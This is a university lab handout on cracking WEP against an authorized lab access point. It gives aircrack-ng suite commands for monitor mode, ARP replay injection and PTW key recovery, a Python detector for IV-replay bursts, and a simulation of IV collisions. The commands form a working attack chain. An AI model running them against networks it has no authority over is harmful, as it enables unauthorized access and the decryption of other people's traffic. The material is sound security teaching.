
WIR-101 Lab 3 — WEP Crack: IV Collection and PTW Attack


Prerequisites: Week 3 lecture; aircrack-ng suite installed; authorized WEP lab AP available
Duration: ~90 min
Points: 100


Authorization

  • Lab Authorization Form signed
  • Target: authorized WEP lab AP only (SSID: VCA-WIR101-WEP -- confirm BSSID with instructor before starting)
  • Do not attempt to crack any other AP visible in airodump-ng
  • Cracked key is for academic documentation only; do not use it to access other systems

Objective

Execute the complete WEP cracking chain: monitor mode, passive IV collection, ARP replay to accelerate collection, and PTW attack with aircrack-ng. Understand at each step why the attack works.


Part A — Monitor Mode and Target Identification (10 min)

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Locate VCA-WIR101-WEP in the output. Record:

  • BSSID: ___
  • Channel: ___
  • ENC column (should show "WEP")

Lock to the target:

sudo airodump-ng -c CHANNEL --bssid BSSID -w wep_capture --output-format pcap,csv wlan0mon

Leave this terminal running. Open a second terminal for the remaining steps.

Deliverable A

Screenshot of airodump-ng with the WEP AP visible and selected.


Part B — Passive IV Collection (15 min)

Wait 10 minutes with airodump-ng running. The #Data column counts captured data frames. Every WEP data frame carries its own 24-bit IV in the clear, so this column is approximately the number of IVs collected.

On a quiet network with no clients actively transmitting, IV collection will be slow. If you have fewer than 500 IVs after 10 minutes, proceed to Part C (ARP replay) to accelerate.

Note the IV count at the end of Part B.

Deliverable B

Screenshot of airodump-ng showing the data frame count after passive collection.


Part C — ARP Replay Attack (20 min)

The ARP replay attack captures an ARP request from the network and replays it rapidly, forcing the AP to generate new encrypted responses (each with a unique IV).

First, authenticate to the AP (open-system auth, required before injection):

sudo aireplay-ng -1 0 -e VCA-WIR101-WEP -a BSSID -h OUR_MAC wlan0mon

Then start the ARP replay:

sudo aireplay-ng -3 -b BSSID -h OUR_MAC wlan0mon

You should see "Read X packets, sent Y packets" incrementing rapidly once an ARP packet is captured. The airodump-ng #Data counter should climb at hundreds of packets per minute.

Wait until you have at least 20,000 IVs (or 40,000 for the 104-bit key variant), then proceed to Part D.

Note: if no ARP packets are captured within 5 minutes, ask the instructor to connect a client to the lab AP and generate some traffic.
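The following Python is an added example for Parts B and C, not part of the lab handout. It parses constructed 802.11 WEP data frames, counts distinct IVs (the figure aircrack-ng actually consumes, which replayed copies do not increase) and flags the signature a wireless IDS uses to spot an ARP-replay burst: one transmitter re-sending a single IV hundreds of times while the legitimate station and AP advance their IVs frame by frame. The frame layout follows the standard 802.11 data-frame header (Addr2 is always the transmitter) with the 3-byte IV and key-index byte immediately after it; the MAC addresses, frame counts and the zero-filled body/ICV are constructed test data, since only the header and IV fields are inspected.

```python
"""Count WEP IVs in 802.11 data frames and flag IV replay (added example)."""
import struct
from collections import Counter, defaultdict

FC_DATA = 0x08          # Frame Control byte 0: type=data, subtype=0
FLAG_TO_DS = 0x01       # Frame Control byte 1 flags
FLAG_FROM_DS = 0x02
FLAG_PROTECTED = 0x40   # the "WEP"/protected bit


def build_wep_data_frame(src, dst, bssid, iv, key_idx=0, body=b"\x00" * 36, to_ds=True):
    """Constructed test frame: header(24) | IV(3) keyid(1) | body | ICV(4).
    Body and ICV are dummy zeros; the example only reads header and IV fields."""
    flags = FLAG_PROTECTED | (FLAG_TO_DS if to_ds else FLAG_FROM_DS)
    if to_ds:   # station -> AP: Addr1=BSSID, Addr2=source (transmitter), Addr3=dest
        addr1, addr2, addr3 = bssid, src, dst
    else:       # AP -> station: Addr1=dest, Addr2=BSSID (transmitter), Addr3=source
        addr1, addr2, addr3 = dst, bssid, src
    header = struct.pack("<BBH", FC_DATA, flags, 0) + addr1 + addr2 + addr3 + struct.pack("<H", 0)
    return header + iv + bytes([(key_idx & 0x3) << 6]) + body + b"\x00" * 4


def parse_wep_frame(frame):
    """Return (transmitter, iv, key_idx) for a protected data frame, else None.
    Handles QoS data frames (extra 2-byte QoS field) and 4-address WDS frames."""
    if len(frame) < 2:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 & 0x0C) != 0x08 or not (fc1 & FLAG_PROTECTED):
        return None                       # not a data frame, or not encrypted
    hdr_len = 24
    if (fc1 & 0x03) == 0x03:
        hdr_len += 6                      # ToDS+FromDS: fourth address present
    if fc0 & 0x80:
        hdr_len += 2                      # QoS data subtype: QoS Control field
    if len(frame) < hdr_len + 4 + 4:      # need IV/keyid and at least the ICV
        return None
    transmitter = frame[10:16]            # Addr2 is the transmitter in every data frame
    # IV byte order is only a labelling convention for counting purposes
    iv = int.from_bytes(frame[hdr_len:hdr_len + 3], "big")
    key_idx = frame[hdr_len + 3] >> 6
    return transmitter, iv, key_idx


def iv_statistics(frames):
    """(encrypted data frames seen, distinct IVs seen): the second number is what
    a statistical WEP attack needs; verbatim replays only inflate the first."""
    ivs = Counter()
    for f in frames:
        p = parse_wep_frame(f)
        if p:
            ivs[p[1]] += 1
    return sum(ivs.values()), len(ivs)


def detect_iv_replay(frames, threshold=50):
    """Flag transmitters that re-send one IV more than `threshold` times.
    A legitimate station increments its IV per frame; an injector re-sends one
    captured frame verbatim, so a single (transmitter, IV) pair dominates."""
    per_ta = defaultdict(Counter)
    for f in frames:
        p = parse_wep_frame(f)
        if p:
            ta, iv, _ = p
            per_ta[ta][iv] += 1
    alerts = []
    for ta, ivs in per_ta.items():
        iv, n = ivs.most_common(1)[0]
        if n > threshold:
            alerts.append((ta.hex(":"), iv, n))
    return alerts


# Constructed capture: placeholder locally-administered MACs, 200 station frames and
# 200 AP frames with fresh IVs, plus one frame from an injector re-sent 300 times.
AP = bytes.fromhex("02000000aa01")
STA = bytes.fromhex("02000000bb01")
INJ = bytes.fromhex("02000000cc01")


def constructed_capture():
    frames = []
    for i in range(200):
        frames.append(build_wep_data_frame(STA, AP, AP, (1000 + i).to_bytes(3, "big"), to_ds=True))
        frames.append(build_wep_data_frame(AP, STA, AP, (5000 + i).to_bytes(3, "big"), to_ds=False))
    replayed = build_wep_data_frame(INJ, AP, AP, (1234).to_bytes(3, "big"), to_ds=True)
    frames.extend([replayed] * 300)
    return frames


if __name__ == "__main__":
    cap = constructed_capture()
    total, distinct = iv_statistics(cap)
    print(f"encrypted data frames: {total}, distinct IVs: {distinct}")
    for ta, iv, n in detect_iv_replay(cap):
        print(f"REPLAY ALERT: {ta} re-sent IV 0x{iv:06x} {n} times")
```

On the constructed capture the raw frame count is 700 but only 401 distinct IVs appear, because the 300 replayed copies all carry the same IV; the 200 fresh IVs in the AP's replies are the part of the replay that actually feeds the key-recovery statistics. The same per-transmitter IV histogram, kept over a sliding window, is a cheap WIDS rule for replay injection on any network still running WEP.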

Deliverable C

Screenshot of aireplay-ng output showing active ARP replay with packet counts.


Part D — PTW Crack with aircrack-ng (20 min)

With 20,000+ IVs captured, attempt the crack:

aircrack-ng -z wep_capture-01.cap

The -z flag selects the PTW attack (it is the default in current aircrack-ng releases, so it may be omitted; -K would instead select the older KoreK statistical attacks, which need far more IVs). aircrack-ng reports the key when found, or "KEY NOT FOUND" with a recommendation to collect more IVs.

If PTW fails at 20,000: continue collecting to 40,000 and retry.

Record:

  • Number of IVs at crack attempt: ___
  • Did the crack succeed? (yes/no)
  • If yes: the WEP key in hex: ___
  • Time taken: ___

Deliverable D

Screenshot of aircrack-ng showing the cracked key (or the "KEY NOT FOUND" output with IV count if it did not succeed -- and explain why more IVs are needed).


Part E — Analysis (15 min)

In Python, implement a simplified demonstration of the IV collision problem:

import math
import random

# Simulate the WEP IV birthday problem: how many data frames until two frames
# share a 24-bit IV (and hence the same RC4 keystream under a fixed WEP key)?
random.seed(42)
iv_space = 2**24  # 16,777,216 possible IVs


def frames_to_first_collision(rng=random):
    """Draw IVs uniformly at random until one repeats; return the frame count."""
    seen = set()
    count = 0
    while True:
        iv = rng.randrange(iv_space)
        if iv in seen:
            return count
        seen.add(iv)
        count += 1


def first_collision_bound():
    """Smallest N with expected pairwise collisions N*(N-1) / (2*iv_space) >= 1,
    i.e. N*(N-1) >= 2*iv_space, solved exactly with the quadratic formula."""
    return math.ceil((1 + math.sqrt(1 + 8 * iv_space)) / 2)


if __name__ == "__main__":
    # Each trial needs only a few thousand draws, so simulating is cheap;
    # the expected value is sqrt(pi * iv_space / 2), about 5,133 frames.
    trials = [frames_to_first_collision() for _ in range(200)]
    mean = sum(trials) / len(trials)
    N = first_collision_bound()
    print(f"Simulated mean frames to first IV collision (200 trials): {mean:,.0f}")
    print(f"Analytic bound (expected collisions >= 1): {N:,} frames")
    # 100 Mbps is the handout's illustrative link rate (802.11g's nominal maximum is 54 Mbps)
    print(f"At a 100 Mbps link with 1500-byte frames: {N / (100e6 / 1500 / 8):.1f} seconds")

Run this and record the output. Relate it to the FMS attack: why does IV collision matter for key recovery?

Deliverable E

The Python output + a 2-paragraph explanation connecting IV collision to the FMS attack.


Write-up Questions

  1. Explain why the ARP replay attack accelerates WEP cracking rather than just being a denial-of-service.
  2. The PTW attack requires ~40,000 IVs for 104-bit WEP. If the AP transmits at 1000 data frames/sec, how long does passive collection take? How long with ARP replay at 500 replays/sec?
  3. WPA was designed as a firmware upgrade for existing WEP hardware. TKIP retained RC4 but used a 48-bit IV and per-packet key mixing. Does per-packet key mixing defeat the FMS attack? Explain why or why not.
  4. A client connects to your cracked WEP AP. You have the WEP key. Can you decrypt their traffic with Wireshark? How?

Cleanup

sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Virtual Path

The virtual path for this lab provides wep_capture_40k_ivs.cap -- a pre-captured file with 40,000+ IVs. Run aircrack-ng against it directly (skip Parts A-C). You still complete Parts D and E.


Submission

Zip into lab3_YOURNAME.zip:

  • deliverable_A.png through deliverable_E.{md,png,txt}
  • writeup.md
  • wep_iv_analysis.py (Part E code)